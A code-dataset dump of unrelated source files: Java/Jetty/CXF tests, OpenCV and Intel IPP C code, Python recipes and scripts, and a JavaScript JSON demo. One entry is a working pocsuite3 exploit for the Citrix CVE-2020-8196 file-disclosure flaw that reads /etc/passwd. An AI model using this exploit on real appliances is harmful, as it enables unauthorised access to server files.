max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
|---|---|---|
839
|
<filename>rt/transports/websocket/src/test/java/org/apache/cxf/transport/websocket/ahc/AhcWebSocketConduitTest.java
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.cxf.transport.websocket.ahc;
import org.apache.cxf.transport.websocket.WebSocketConstants;
import org.junit.Test;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNull;
import static org.junit.Assert.assertTrue;
/**
*
*/
public class AhcWebSocketConduitTest {
private static final String TEST_RESPONSE1 =
"200\r\nresponseId: 59610eed-d9de-4692-96d4-bb95a36c41ea\r\nContent-Type: text/plain\r\n\r\nHola!";
private static final String TEST_RESPONSE2 =
"responseId: 59610eed-d9de-4692-96d4-bb95a36c41ea\r\n\r\nNada!";
@Test
public void testResponseParsing() throws Exception {
// with all the headers using type string
AhcWebSocketConduit.Response resp =
new AhcWebSocketConduit.Response(WebSocketConstants.DEFAULT_RESPONSE_ID_KEY, TEST_RESPONSE1);
assertEquals(200, resp.getStatusCode());
assertEquals("59610eed-d9de-4692-96d4-bb95a36c41ea", resp.getId());
assertEquals("text/plain", resp.getContentType());
assertTrue(resp.getEntity() instanceof String);
assertEquals("Hola!", resp.getEntity());
// with all the heaers using type byte[]
resp = new AhcWebSocketConduit.Response(WebSocketConstants.DEFAULT_RESPONSE_ID_KEY, TEST_RESPONSE1.getBytes());
assertEquals(200, resp.getStatusCode());
assertEquals("59610eed-d9de-4692-96d4-bb95a36c41ea", resp.getId());
assertEquals("text/plain", resp.getContentType());
assertTrue(resp.getEntity() instanceof byte[]);
assertEquals("Hola!", resp.getTextEntity());
// with only the id header using type String
resp = new AhcWebSocketConduit.Response(WebSocketConstants.DEFAULT_RESPONSE_ID_KEY, TEST_RESPONSE2);
assertEquals(0, resp.getStatusCode());
assertEquals("59610eed-d9de-4692-96d4-bb95a36c41ea", resp.getId());
assertNull(resp.getContentType());
assertTrue(resp.getEntity() instanceof String);
assertEquals("Nada!", resp.getEntity());
// with only the id header using type byte[]
resp = new AhcWebSocketConduit.Response(WebSocketConstants.DEFAULT_RESPONSE_ID_KEY, TEST_RESPONSE2.getBytes());
assertEquals(0, resp.getStatusCode());
assertEquals("59610eed-d9de-4692-96d4-bb95a36c41ea", resp.getId());
assertNull(resp.getContentType());
assertTrue(resp.getEntity() instanceof byte[]);
assertEquals("Nada!", resp.getTextEntity());
}
}
| 1,276
|
3,353
|
//
// ========================================================================
// Copyright (c) 1995-2021 Mort Bay Consulting Pty Ltd and others.
//
// This program and the accompanying materials are made available under the
// terms of the Eclipse Public License v. 2.0 which is available at
// https://www.eclipse.org/legal/epl-2.0, or the Apache License, Version 2.0
// which is available at https://www.apache.org/licenses/LICENSE-2.0.
//
// SPDX-License-Identifier: EPL-2.0 OR Apache-2.0
// ========================================================================
//
package org.eclipse.jetty.websocket.javax.tests;
import java.io.IOException;
import java.net.URI;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.TimeUnit;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.websocket.CloseReason;
import javax.websocket.DeploymentException;
import javax.websocket.Endpoint;
import javax.websocket.EndpointConfig;
import javax.websocket.Session;
import javax.websocket.server.ServerEndpointConfig;
import org.eclipse.jetty.server.Server;
import org.eclipse.jetty.server.ServerConnector;
import org.eclipse.jetty.servlet.ServletContextHandler;
import org.eclipse.jetty.servlet.ServletHolder;
import org.eclipse.jetty.util.ajax.JSON;
import org.eclipse.jetty.websocket.javax.client.internal.JavaxWebSocketClientContainer;
import org.eclipse.jetty.websocket.javax.server.config.JavaxWebSocketServletContainerInitializer;
import org.eclipse.jetty.websocket.javax.server.internal.JavaxWebSocketServerContainer;
import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.is;
import static org.junit.jupiter.api.Assertions.assertTrue;
public class ProgrammaticWebSocketUpgradeTest
{
private static final Map<String, String> PATH_PARAMS = Map.of("param1", "value1", "param2", "value2");
private static final JSON JSON = new JSON();
private Server server;
private ServerConnector connector;
private JavaxWebSocketClientContainer client;
@BeforeEach
public void before() throws Exception
{
client = new JavaxWebSocketClientContainer();
server = new Server();
connector = new ServerConnector(server);
server.addConnector(connector);
ServletContextHandler contextHandler = new ServletContextHandler(ServletContextHandler.SESSIONS);
contextHandler.setContextPath("/");
contextHandler.addServlet(new ServletHolder(new CustomUpgradeServlet()), "/");
server.setHandler(contextHandler);
JavaxWebSocketServletContainerInitializer.configure(contextHandler, null);
server.start();
client.start();
}
@AfterEach
public void stop() throws Exception
{
client.stop();
server.stop();
}
public static class PathParamsEndpoint extends Endpoint
{
@Override
public void onOpen(Session session, EndpointConfig config)
{
try
{
session.getBasicRemote().sendText(JSON.toJSON(session.getPathParameters()));
session.close();
}
catch (IOException e)
{
throw new RuntimeException(e);
}
}
}
public static class CustomUpgradeServlet extends HttpServlet
{
private JavaxWebSocketServerContainer container;
@Override
public void init(ServletConfig config) throws ServletException
{
super.init(config);
container = JavaxWebSocketServerContainer.getContainer(getServletContext());
}
@Override
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException
{
try
{
switch (request.getServletPath())
{
case "/echo":
{
ServerEndpointConfig sec = ServerEndpointConfig.Builder.create(EchoSocket.class, "/").build();
HashMap<String, String> pathParams = new HashMap<>();
container.upgradeHttpToWebSocket(request, response, sec, pathParams);
break;
}
case "/pathParams":
{
ServerEndpointConfig sec = ServerEndpointConfig.Builder.create(PathParamsEndpoint.class, "/").build();
container.upgradeHttpToWebSocket(request, response, sec, PATH_PARAMS);
break;
}
default:
throw new IllegalStateException();
}
}
catch (DeploymentException e)
{
throw new ServletException(e);
}
}
}
@Test
public void testWebSocketUpgrade() throws Exception
{
URI uri = URI.create("ws://localhost:" + connector.getLocalPort() + "/echo");
EventSocket socket = new EventSocket();
try (Session session = client.connectToServer(socket, uri))
{
session.getBasicRemote().sendText("hello world");
}
assertTrue(socket.closeLatch.await(5, TimeUnit.SECONDS));
String msg = socket.textMessages.poll();
assertThat(msg, is("hello world"));
assertThat(socket.closeReason.getCloseCode(), is(CloseReason.CloseCodes.NORMAL_CLOSURE));
}
@Test
public void testPathParameters() throws Exception
{
URI uri = URI.create("ws://localhost:" + connector.getLocalPort() + "/pathParams");
EventSocket socket = new EventSocket();
client.connectToServer(socket, uri);
assertTrue(socket.closeLatch.await(5, TimeUnit.SECONDS));
String msg = socket.textMessages.poll();
assertThat(JSON.fromJSON(msg), is(PATH_PARAMS));
assertThat(socket.closeReason.getCloseCode(), is(CloseReason.CloseCodes.NORMAL_CLOSURE));
}
}
| 2,537
|
56,632
|
// This file is part of OpenCV project.
// It is subject to the license terms in the LICENSE file found in the top-level directory
// of this distribution and at http://opencv.org/license.html.
#if !defined CV_CPU_OPTIMIZATION_DECLARATIONS_ONLY && \
!defined CV_DISABLE_OPTIMIZATION && defined CV_ENABLE_INTRINSICS // TODO? C++ fallback implementation for SIMD256
#define CV__SIMD_FORCE_WIDTH 256
#include "opencv2/core/hal/intrin.hpp"
#undef CV__SIMD_FORCE_WIDTH
#if CV_SIMD_WIDTH != 32
#error "Invalid build configuration"
#endif
#endif // CV_CPU_OPTIMIZATION_DECLARATIONS_ONLY
namespace opencv_test { namespace hal { namespace intrin256 {
CV_CPU_OPTIMIZATION_NAMESPACE_BEGIN
#include "test_intrin_utils.hpp"
CV_CPU_OPTIMIZATION_NAMESPACE_END
}}} //namespace
| 283
|
6,989
|
"""
Shim to maintain backwards compatibility with old IPython.nbformat imports.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import sys
from warnings import warn
from IPython.utils.shimmodule import ShimModule, ShimWarning
warn("The `IPython.nbformat` package has been deprecated since IPython 4.0. "
"You should import from nbformat instead.", ShimWarning)
# Unconditionally insert the shim into sys.modules so that further import calls
# trigger the custom attribute access above
sys.modules['IPython.nbformat'] = ShimModule(
src='IPython.nbformat', mirror='nbformat')
| 173
|
2,023
|
this is ajax.html
------------------------------------------------
<html>
<head>
<title>simple ajax json example</title>
<script language="JavaScript">
//json parser
//from json.org with small modification
var cur_str_chr;
function json_parse(text) {
var at = 0;
var ch = ' ';
function error(m) {
throw {
name: 'JSONError',
message: m,
at: at - 1,
text: text
};
}
function next() {
ch = text.charAt(at);
at += 1;
return ch;
}
function white() {
while (ch !== '' && ch <= ' ') {
next();
}
}
function str() {
var i, s = '', t, u;
if (ch == '\'' || ch == '"') { //change " to ' for python
cur_str_chr = ch;
outer: while (next()) {
if (ch == cur_str_chr) {
next();
return s;
} else if (ch == '\\') {
switch (next()) {
case 'b':
s += '\b';
break;
case 'f':
s += '\f';
break;
case 'n':
s += '\n';
break;
case 'r':
s += '\r';
break;
case 't':
s += '\t';
break;
case 'u':
u = 0;
for (i = 0; i < 4; i += 1) {
t = parseInt(next(), 16);
if (!isFinite(t)) {
break outer;
}
u = u * 16 + t;
}
s += String.fromCharCode(u);
break;
default:
s += ch;
}
} else {
s += ch;
}
}
}
error("Bad string");
}
function arr() {
var a = [];
if (ch == '[') {
next();
white();
if (ch == ']') {
next();
return a;
}
while (ch) {
a.push(val());
white();
if (ch == ']') {
next();
return a;
} else if (ch != ',') {
break;
}
next();
white();
}
}
error("Bad array");
}
function obj() {
var k, o = {};
if (ch == '{') {
next();
white();
if (ch == '}') {
next();
return o;
}
while (ch) {
k = str();
white();
if (ch != ':') {
break;
}
next();
o[k] = val();
white();
if (ch == '}') {
next();
return o;
} else if (ch != ',') {
break;
}
next();
white();
}
}
error("Bad object");
}
function num() {
var n = '', v;
if (ch == '-') {
n = '-';
next();
}
while (ch >= '0' && ch <= '9') {
n += ch;
next();
}
if (ch == '.') {
n += '.';
while (next() && ch >= '0' && ch <= '9') {
n += ch;
}
}
if (ch == 'e' || ch == 'E') {
n += 'e';
next();
if (ch == '-' || ch == '+') {
n += ch;
next();
}
while (ch >= '0' && ch <= '9') {
n += ch;
next();
}
}
if (ch == 'L')next();//for python long
v = +n;
if (!isFinite(v)) {
error("Bad number");
} else {
return v;
}
}
function word() {
switch (ch) {
case 't':
if (next() == 'r' && next() == 'u' && next() == 'e') {
next();
return true;
}
break;
case 'f':
if (next() == 'a' && next() == 'l' && next() == 's' &&
next() == 'e') {
next();
return false;
}
break;
case 'n':
if (next() == 'u' && next() == 'l' && next() == 'l') {
next();
return null;
}
break;
}
error("Syntax error");
}
function val() {
white();
switch (ch) {
case '{':
return obj();
case '[':
return arr();
case '\'':
case '"':
return str();
case '-':
return num();
default:
return ch >= '0' && ch <= '9' ? num() : word();
}
}
return val();
}
//end json parser
function loadurl(dest) {
xmlhttp = window.XMLHttpRequest?new XMLHttpRequest(): new ActiveXObject("Microsoft.XMLHTTP");
xmlhttp.onreadystatechange = pop_table;
xmlhttp.open("GET", dest);
xmlhttp.setRequestHeader("If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT");
xmlhttp.send(null);
}
function pop_table() {
if ((xmlhttp.readyState == 4) && (xmlhttp.status == 200)) {
var json_data = json_parse(xmlhttp.responseText);
var rows = document.getElementById("testtable").getElementsByTagName("tr");
rows[0].childNodes[0].innerHTML = json_data[0]['one']
rows[0].childNodes[1].innerHTML = json_data[0]['two']
rows[0].childNodes[2].innerHTML = json_data[0]['three']
for(i=0;i<rows[1].childNodes.length;i++)
rows[1].childNodes[i].innerHTML = json_data[1][i]
rows[2].childNodes[0].innerHTML = json_data[2]['title']
rows[2].childNodes[2].innerHTML = json_data[2]['random']
}
}
</script>
</head>
<body>
<div id="clickhere" onclick="loadurl('/cgi-bin/ajax.cgi')">click here</div>
<table id="testtable" border=1>
<tr><td>11</td><td>12</td><td>13</td></tr>
<tr><td>21</td><td>22</td><td>23</td></tr>
<tr><td>31</td><td>32</td><td>33</td></tr>
</table>
</body>
</html>
--------------------------------------------
This is /cgi-bin/ajax.cgi
--------------------------------------------
#!/bin/env python
import random
print "Content-type: text/html;charset=utf-8\r\n"
data =[]
data.append({"one":'Hello world',"two":12345678L,"three":3.1415926})
data.append(['to',"be","or",'not',"to",'be'])
data.append({'title':"that's the question",'random':random.randrange(0,1000000)})
print str(data)
----------------------------------------------
| 5,122
|
782
|
// Copyright (c) 2018 Intel Corporation
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
#include "precomp.h"
#include "owncc.h"
#if defined(_REF_LIB)
extern void lmmintrin_init();
#endif
#if _IPPLRB >= _IPPLRB_B1
void lrbAlYCbCr422_8u_P3C2R( const Ipp8u* pSrc[3], int srcStep[3], Ipp8u* pDst, int dstStep, IppiSize roiSize);
void lrbYCbCr422_8u_P3C2R ( const Ipp8u* pSrc[3], int srcStep[3], Ipp8u* pDst, int dstStep, IppiSize roiSize);
#endif
#if defined _A6
extern void Join422_8u_A6 (const Ipp8u* src[3], int step[3],
Ipp8u* dst, int dstep, int width, int height);
extern void Split422_8u_A6(const Ipp8u* src, int step,
Ipp8u* dst[3], int dstep[3], int width, int height);
#endif
#if _IPP > _IPP_A6 /*defined _W7*/
extern void Join422_8u_W7 (const Ipp8u* src[3], int step[3],
Ipp8u* dst, int dstep, int width, int height);
extern void Split422_8u_W7(const Ipp8u* src, int step,
Ipp8u* dst[3], int dstep[3], int width, int height);
#endif
#if defined _I7
extern void Join422_8u_I7 (Ipp8u*, Ipp8u*, Ipp8u*, Ipp8u*, int*, int, int);
extern void Split422_8u_I7(const Ipp8u*, Ipp8u*, Ipp8u*, Ipp8u*, int*, int, int);
#endif
/*
formerly mfxiJoin422_8u_P3C2R
For input we has :
plain #1
y0y1y2y3y4y5 G roiSize in this place
plain #2
cb0cb1cb2 B
plain #3
cr0cr1cr2 R
for output we'l should to receive
y0 cb0 y1 cr0 y2 cb1 y3 cr1 y4 cb2 y5 cr2 */
IPPFUN(IppStatus,mfxiYCbCr422_8u_P3C2R,( const Ipp8u* pSrc[3], int srcStep[3],
Ipp8u* pDst, int dstStep, IppiSize roiSize))
{
#if defined _I7
int Inp_Arr[4];
#endif
Ipp8u* pSrc_Y0 ;
Ipp8u* pSrc_cB ;
Ipp8u* pSrc_cR ;
int Step_Y ;
int Step_cB ;
int Step_cR ;
/* test pointers */
IPP_BAD_PTR1_RET(pSrc);
IPP_BAD_PTR1_RET(pDst);
IPP_BAD_PTR1_RET(pSrc[0]); IPP_BAD_PTR1_RET(pSrc[1]); IPP_BAD_PTR1_RET(pSrc[2]);
IPP_BADARG_RET((roiSize.width < 2), ippStsSizeErr);
IPP_BADARG_RET((roiSize.height<=0), ippStsSizeErr);
pSrc_Y0 = (Ipp8u*)pSrc[0];
pSrc_cB = (Ipp8u*)pSrc[1];
pSrc_cR = (Ipp8u*)pSrc[2];
Step_Y = srcStep[0];
Step_cB = srcStep[1];
Step_cR = srcStep[2];
/* test ROI size */
#if defined(_REF_LIB)
lmmintrin_init();
#endif
#if _IPPLRB >= _IPPLRB_B1
if(
!(
(srcStep[0] & 0x0f) || (srcStep[1] & 0x0f) || (srcStep[2] & 0x07) ||
(dstStep & 0x0f) || (IPP_UINT_PTR(pDst) & 0x0f) ||
(IPP_UINT_PTR(pSrc[0]) & 0x0f) || (IPP_UINT_PTR(pSrc[1]) & 0x07) ||
(IPP_UINT_PTR(pSrc[2]) & 0x07)
)
)
lrbAlYCbCr422_8u_P3C2R( pSrc, srcStep, pDst, dstStep, roiSize);
else
lrbYCbCr422_8u_P3C2R( pSrc, srcStep, pDst, dstStep, roiSize);
//return ippStsNoErr;
#elif !defined _I7
roiSize.width &= -2;
//#if !defined _I7
# if _IPP < _IPP_A6
roiSize.width *= 2;
int i;
for(i = 0; i < roiSize.height; i++) {
int j;
int k = 0;
int m = 0;
for(j = 0; j < roiSize.width; j += 4)
{
pDst[j + 0] = pSrc_Y0[m ];
pDst[j + 1] = pSrc_cB[k ];
pDst[j + 2] = pSrc_Y0[m + 1];
pDst[j + 3] = pSrc_cR[k ];
m += 2;
k++;
}
pSrc_Y0 += Step_Y;
pSrc_cB += Step_cB;
pSrc_cR += Step_cR;
pDst += dstStep;
}
# elif _IPP > _IPP_A6
Join422_8u_W7(pSrc, srcStep, pDst, dstStep, roiSize.width, roiSize.height);
# else
Join422_8u_A6(pSrc, srcStep, pDst, dstStep, roiSize.width, roiSize.height);
# endif
#else
Inp_Arr[0] = Step_Y;
Inp_Arr[1] = Step_cB;
Inp_Arr[2] = Step_cR;
Inp_Arr[3] = dstStep;
Join422_8u_I7(pSrc_Y0, pSrc_cB, pSrc_cR, pDst, Inp_Arr, roiSize.width, roiSize.height);
#endif
return ippStsNoErr;
} /* mfxiJoin422_8u_P3C2R() */
| 2,439
|
4,036
|
<reponame>timoles/codeql<gh_stars>1000+
import java.util.Random;
public class Test {
public static void test() {
(new Random()).nextInt();
}
}
| 58
|
619
|
<gh_stars>100-1000
from typing import List
from pyrep.objects.joint import Joint
from rlbench.backend.task import Task
from rlbench.backend.conditions import JointCondition
class CloseBox(Task):
def init_task(self) -> None:
box_joint = Joint('joint')
self.register_success_conditions([JointCondition(box_joint, 2.6)])
def init_episode(self, index: int) -> List[str]:
return ['close box',
'close the lid on the box',
'shut the box',
'shut the box lid']
def variation_count(self) -> int:
return 1
| 246
|
341
|
# -*- coding: utf-8 -*-
# @Author: <NAME>
# @Date: 2018-10-30 19:14:37
# @Last Modified by: <NAME>
# @Last Modified time: 2018-11-22 15:12:36
import os
import cv2
import sys
import numpy as np
from PIL import Image, ImageDraw
data_dir = '/home/song/srpn/dataset/vid/ILSVRC2015_VID_train_0000/ILSVRC2015_train_00010013' # contain img and groundtruth.txt
save_dir = '/home/song/srpn/tmp/tmp_script'
imgnames = [name for name in os.listdir(data_dir) if name.find('.jpg') != -1]
imgnames = sorted(imgnames)
gt_path = os.path.join(data_dir, 'groundtruth.txt')
with open(gt_path, 'r') as f:
lines = f.readlines()
for idx, i in enumerate(imgnames):
print(idx)
# gt
line = lines[idx]
x1, y1, w, h = [int(float(i)) for i in line.split(',')[:4]]
x2 = x1 + w
y2 = y1 + h
# img
imgpath = os.path.join(data_dir, i)
im = Image.open(imgpath)
draw = ImageDraw.Draw(im)
draw.line([(x1, y1), (x2, y1), (x2, y2), (x1, y2), (x1, y1)], width=1, fill='red')
save_path = os.path.join(save_dir, '{}.jpg'.format(idx))
im.save(save_path)
| 466
|
1,337
|
<gh_stars>1000+
/*
* Copyright (c) 2008-2019 Haulmont.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.haulmont.cuba.core.app;
import com.haulmont.cuba.core.PersistenceSecurity;
import com.haulmont.cuba.core.entity.Entity;
import com.haulmont.cuba.security.entity.EntityOp;
import com.haulmont.cuba.security.group.ConstraintValidationResult;
import com.haulmont.cuba.security.group.PersistenceSecurityService;
import org.springframework.stereotype.Service;
import javax.inject.Inject;
@Service(PersistenceSecurityService.NAME)
public class PersistenceSecurityServiceBean implements PersistenceSecurityService {
@Inject
protected PersistenceSecurity persistenceSecurity;
@Override
public boolean isPermitted(Entity entity, EntityOp operation) {
return persistenceSecurity.isPermitted(entity, operation);
}
@Override
public boolean isPermitted(Entity entity, String customCode) {
return persistenceSecurity.isPermitted(entity, customCode);
}
@Override
public Object evaluateConstraintScript(Entity entity, String groovyScript) {
return persistenceSecurity.evaluateConstraintScript(entity, groovyScript);
}
@Override
public ConstraintValidationResult validateConstraintScript(String entityType, String groovyScript) {
return persistenceSecurity.validateConstraintScript(entityType, groovyScript);
}
}
| 564
|
376
|
<filename>sample/src/main/java/com/greenfrvr/hashtagview/sample/SamplesAdapter.java
package com.greenfrvr.hashtagview.sample;
import android.content.Context;
import android.support.v4.app.Fragment;
import android.support.v4.app.FragmentManager;
import android.support.v4.app.FragmentStatePagerAdapter;
import android.util.SparseArray;
import com.greenfrvr.hashtagview.sample.fragments.BaseSampleFragment;
import com.greenfrvr.hashtagview.sample.fragments.ContactsFragment;
import com.greenfrvr.hashtagview.sample.fragments.DistributionSampleFragment;
import com.greenfrvr.hashtagview.sample.fragments.EventsSampleFragment;
import com.greenfrvr.hashtagview.sample.fragments.GravitySampleFragment;
import com.greenfrvr.hashtagview.sample.fragments.SpacingSampleFragment;
import com.greenfrvr.hashtagview.sample.fragments.StylingSampleFragment;
/**
* Created by greenfrvr
*/
public class SamplesAdapter extends FragmentStatePagerAdapter {
private static final int COUNT = 7;
private static final SparseArray<String> fragments = new SparseArray<>(COUNT);
static {
fragments.append(0, BaseSampleFragment.class.getName());
fragments.append(1, GravitySampleFragment.class.getName());
fragments.append(2, DistributionSampleFragment.class.getName());
fragments.append(3, SpacingSampleFragment.class.getName());
fragments.append(4, EventsSampleFragment.class.getName());
fragments.append(5, StylingSampleFragment.class.getName());
fragments.append(6, ContactsFragment.class.getName());
}
private Context context;
public SamplesAdapter(FragmentManager fm, Context context) {
super(fm);
this.context = context;
}
@Override
public Fragment getItem(int position) {
return Fragment.instantiate(context, fragments.get(position));
}
@Override
public int getCount() {
return COUNT;
}
}
| 661
|
6,278
|
from multiprocessing import cpu_count
from os.path import join
import sh
from pythonforandroid.util import current_directory, ensure_dir
from pythonforandroid.toolchain import shprint
from pythonforandroid.recipe import Recipe
class LibwebpRecipe(Recipe):
version = '1.1.0'
url = 'https://storage.googleapis.com/downloads.webmproject.org/releases/webp/libwebp-{version}.tar.gz' # noqa
depends = []
built_libraries = {
'libwebp.so': 'installation/lib',
'libwebpdecoder.so': 'installation/lib',
'libwebpdemux.so': 'installation/lib',
'libwebpmux.so': 'installation/lib',
}
def build_arch(self, arch):
source_dir = self.get_build_dir(arch.arch)
build_dir = join(source_dir, 'build')
install_dir = join(source_dir, 'installation')
toolchain_file = join(
self.ctx.ndk_dir, 'build', 'cmake', 'android.toolchain.cmake',
)
ensure_dir(build_dir)
with current_directory(build_dir):
env = self.get_recipe_env(arch)
shprint(sh.cmake, source_dir,
f'-DANDROID_ABI={arch.arch}',
f'-DANDROID_NATIVE_API_LEVEL={self.ctx.ndk_api}',
f'-DCMAKE_TOOLCHAIN_FILE={toolchain_file}',
f'-DCMAKE_INSTALL_PREFIX={install_dir}',
'-DCMAKE_BUILD_TYPE=Release',
'-DBUILD_SHARED_LIBS=1',
_env=env)
shprint(sh.make, '-j' + str(cpu_count()), _env=env)
# We make the install because this way we will have
# all the includes and libraries in one place
shprint(sh.make, 'install', _env=env)
recipe = LibwebpRecipe()
| 829
|
1,686
|
// Copyright (c) 2019 The Chromium Embedded Framework Authors. All rights
// reserved. Use of this source code is governed by a BSD-style license that
// can be found in the LICENSE file.
#ifndef CEF_LIBCEF_DLL_SHUTDOWN_CHECKER_H_
#define CEF_LIBCEF_DLL_SHUTDOWN_CHECKER_H_
#pragma once
namespace shutdown_checker {
// Check that CEF objects are not held at CefShutdown.
void AssertNotShutdown();
// Called from libcef_dll.cc and libcef_dll_wrapper.cc.
void SetIsShutdown();
} // namespace shutdown_checker
#endif // CEF_LIBCEF_DLL_SHUTDOWN_CHECKER_H_
| 199
|
370
|
<reponame>luoyongheng/dtslam
#define ZLONG
#include <../Source/umfpack_report_triplet.c>
| 38
|
421
|
<filename>2020/CVE-2020-8196/poc/pocsuite3/CVE-2020-8196.py
import sys
import string
import json
from urllib.parse import quote
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, logger, VUL_TYPE
from pocsuite3.lib.utils import random_str
requests.packages.urllib3.disable_warnings()
class CitrixPOC(POCBase):
vulID = '' # ssvid
version = '1.0'
author = ['z3r0yu']
vulDate = '2020-07-11'
createDate = '2020-07-11'
updateDate = '2020-07-11'
references = ['']
name = 'Citrix LFI'
appPowerLink = ''
appName = 'Citrix'
appVersion = '''
Citrix ADC、Citrix Gateway < 13.0、58.30
Citrix ADC、NetScaler Gateway < 12.1、57.18
Citrix ADC、NetScaler Gateway < 12.0、63.21
Citrix ADC、NetScaler Gateway < 11.1、64.14
NetScaler ADC、NetScaler Gateway < 10.5、70.18
Citrix SD-WAN WANOP < 11.1.1a
Citrix SD-WAN WANOP < 11.0.3d
Citrix SD-WAN WANOP < 10.2.7
'''
vulType = VUL_TYPE.COMMAND_EXECUTION
desc = '''
https://github.com/dmaasland/dmaasland.github.io/blob/10c33bbdab/posts/citrix.md
https://nosec.org/home/detail/4506.html
fofa.so
app="Citrix-Netscaler" || app="Citrix-ADC" || app="Citrix-NetScaler-Gateway" || app="Citrix-Gateway"
'''
samples = []
install_requires = ['']
category = POC_CATEGORY.EXPLOITS.WEBAPP
def create_session(self, base_url, session):
url = '{0}/pcidss/report'.format(base_url)
params = {
'type': 'allprofiles',
'sid': 'loginchallengeresponse1requestbody',
'username': 'nsroot',
'set': '1'
}
headers = {
'Content-Type': 'application/xml',
'X-NITRO-USER': random_str(length=8),
'X-NITRO-PASS': random_str(length=8),
}
data = '<appfwprofile><login></login></appfwprofile>'
session.post(url=url, params=params, headers=headers,
data=data, verify=False)
return session
def fix_session(self, base_url, session):
url = '{0}/menu/ss'.format(base_url)
params = {
'sid': 'nsroot',
'username': 'nsroot',
'force_setup': '1'
}
session.get(url=url, params=params, verify=False)
def get_rand(self, base_url, session):
url = '{0}/menu/stc'.format(base_url)
r = session.get(url=url, verify=False)
for line in r.text.split('\n'):
if 'var rand =' in line:
rand = line.split('"')[1]
return rand
def do_lfi(self, base_url, session, rand):
PAYLOAD = '%2fetc%2fpasswd'
url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD)
headers = {
'Content-Type': 'application/xml',
'X-NITRO-USER': random_str(length=8),
'X-NITRO-PASS': random_str(length=8),
'rand_key': rand
}
data = '<clipermission></clipermission>'
r = session.post(url=url, headers=headers, data=data, verify=False)
# print(r.text)
return r.text
def _verify(self):
result = {}
# print(self.url)
base_url = self.url
# print(url)
try:
logger.info('[-] Creating session..')
session = requests.Session()
self.create_session(base_url, session)
logger.info(session.cookies.get_dict())
logger.info(
'[+] Got session: {0}'.format(session.cookies.get_dict()['SESSID']))
logger.info('[-] Fixing session..')
self.fix_session(base_url, session)
logger.info('[-] Getting rand..')
rand = self.get_rand(base_url, session)
logger.info('[+] Got rand: {0}'.format(rand))
logger.info('[-] Re-breaking session..')
self.create_session(base_url, session)
logger.info('[-] Getting file..')
file_text = self.do_lfi(base_url, session, rand)
if 'root' in file_text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = base_url
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(CitrixPOC)
| 2,235
|
496
|
package com.tns.system.classes.loading.impl;
import com.tns.system.classes.caching.ClassCache;
import com.tns.system.classes.loading.ClassStorageService;
import com.tns.system.classes.loading.LookedUpClassNotFound;
import com.tns.system.classloaders.ClassLoadersCollection;
import org.junit.Before;
import org.junit.Test;
import org.mockito.Mock;
import org.mockito.Mockito;
import org.mockito.MockitoAnnotations;
import java.util.Arrays;
import java.util.Collections;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertSame;
import static org.junit.Assert.fail;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.verifyZeroInteractions;
import static org.mockito.Mockito.when;
public class ClassStorageServiceImplTest {
private static final String TEST_CLASS_LOOKUP_NAME = "com.test.Test";
@Mock
private ClassCache classCache;
@Mock
private ClassLoadersCollection classLoadersCollection;
private ClassStorageService classStorageService;
@Before
public void setUp() {
MockitoAnnotations.initMocks(this);
classStorageService = new ClassStorageServiceImpl(classCache, classLoadersCollection);
}
@Test
public void testRetrieveClassShouldCheckClassCacheFirst() {
Class<?> testResult = Object.class;
Mockito.<Class<?>>when(classCache.getCachedClass(TEST_CLASS_LOOKUP_NAME)).thenReturn(testResult);
